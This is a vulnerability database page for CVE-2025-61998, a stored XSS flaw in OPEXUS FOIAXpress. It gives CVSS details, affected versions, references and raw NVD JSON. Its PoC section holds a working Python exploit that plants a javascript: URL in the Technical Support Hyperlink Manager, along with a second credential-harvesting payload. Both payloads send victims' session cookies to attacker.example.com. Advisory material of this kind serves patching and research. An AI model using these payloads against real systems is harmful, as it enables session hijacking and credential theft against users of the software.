CVE-2025-61998

Description

OPEXUS FOIAXpress before 11.13.3.0 allows an administrative user to inject JavaScript or other content as a URL within the Technical Support Hyperlink Manager. Injected content is executed in the context of other users when they click the malicious link. Successful exploitation allows the administrative user to perform actions on behalf of the target, including stealing session cookies, user credentials, or sensitive data.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:opexustech:foiaxpress:*:*:*:*:*:*:*:* - VULNERABLE

OPEXUS FOIAXpress < 11.13.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61998 - OPEXUS FOIAXpress Stored XSS PoC
# Vulnerability: Stored XSS via Technical Support Hyperlink Manager URL field
# Affected: OPEXUS FOIAXpress < 11.13.3.0

import requests
from urllib.parse import quote

TARGET_URL = "https://target-foiaxpress.example.com"
ADMIN_SESSION = "<admin_session_cookie>"  # Requires valid admin credentials

# Step 1: Authenticate as admin and obtain session
session = requests.Session()
session.cookies.set("JSESSIONID", ADMIN_SESSION)

# Step 2: Craft malicious JavaScript URL payload
# The payload uses javascript: protocol to execute arbitrary code
# in the context of any user who clicks the link
malicious_payload = (
    'javascript:void(document.location='
    '"https://attacker.example.com/steal?cookie="+document.cookie)'
)

# Alternative payload for credential harvesting
credential_harvester = (
    "javascript:" +
    "var%20f=document.createElement('form');" +
    "f.action='https://attacker.example.com/creds';" +
    "f.method='POST';" +
    "var%20i=document.createElement('input');" +
    "i.name='cookie';i.value=document.cookie;" +
    "f.appendChild(i);document.body.appendChild(f);f.submit();"
)

# Step 3: Submit the malicious URL via Technical Support Hyperlink Manager
# This endpoint is used by admins to configure support hyperlinks
endpoint = f"{TARGET_URL}/foiaxpress/admin/hyperlinkManager"

payload = {
    "hyperlinkName": "Technical Support",
    "hyperlinkUrl": malicious_payload,  # Inject malicious JavaScript URL
    "description": "Click here for technical support"
}

response = session.post(endpoint, data=payload)
print(f"[*] Payload submitted - Status: {response.status_code}")

# Step 4: Verify the malicious link is stored
verify_response = session.get(f"{TARGET_URL}/foiaxpress/admin/hyperlinkManager/list")
if malicious_payload in verify_response.text:
    print("[+] XSS payload successfully stored!")
    print("[+] When any user clicks the link, their session cookie will be exfiltrated")
else:
    print("[-] Payload not found in response")

# Step 5: Attacker receives stolen cookies at their server
# Server-side handler (attacker.example.com):
# GET /steal?cookie=<stolen_session_cookie>
# The attacker can now impersonate the victim using the stolen session

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61998
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61998
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61998/
[4] VulDB https://vuldb.com/cve/CVE-2025-61998
[5] https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf
[6] https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-280-01.json
[7] https://www.cve.org/CVERecord?id=CVE-2025-61998

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61998", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-10-08T00:15:34.220", "lastModified": "2025-10-22T14:45:10.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPEXUS FOIAXpress before 11.13.3.0 allows an administrative user to inject JavaScript or other content as a URL within the Technical Support Hyperlink Manager. Injected content is executed in the context of other users when they click the malicious link. Successful exploitation allows the administrative user to perform actions on behalf of the target, including stealing session cookies, user credentials, or sensitive data."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opexustech:foiaxpress:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.13.3.0", "matchCriteriaId": "7077A02D-D6F5-4E4E-B6A4-E2D8AFBF8EAC"}]}]}], "references": [{"url": "https://docs.opexustech.com/docs/foiaxpress/11.13.0/FOIAXpress_Release_Notes_11.13.3.0.pdf", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Release Notes"]}, {"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-280-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-61998", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory"]}]}}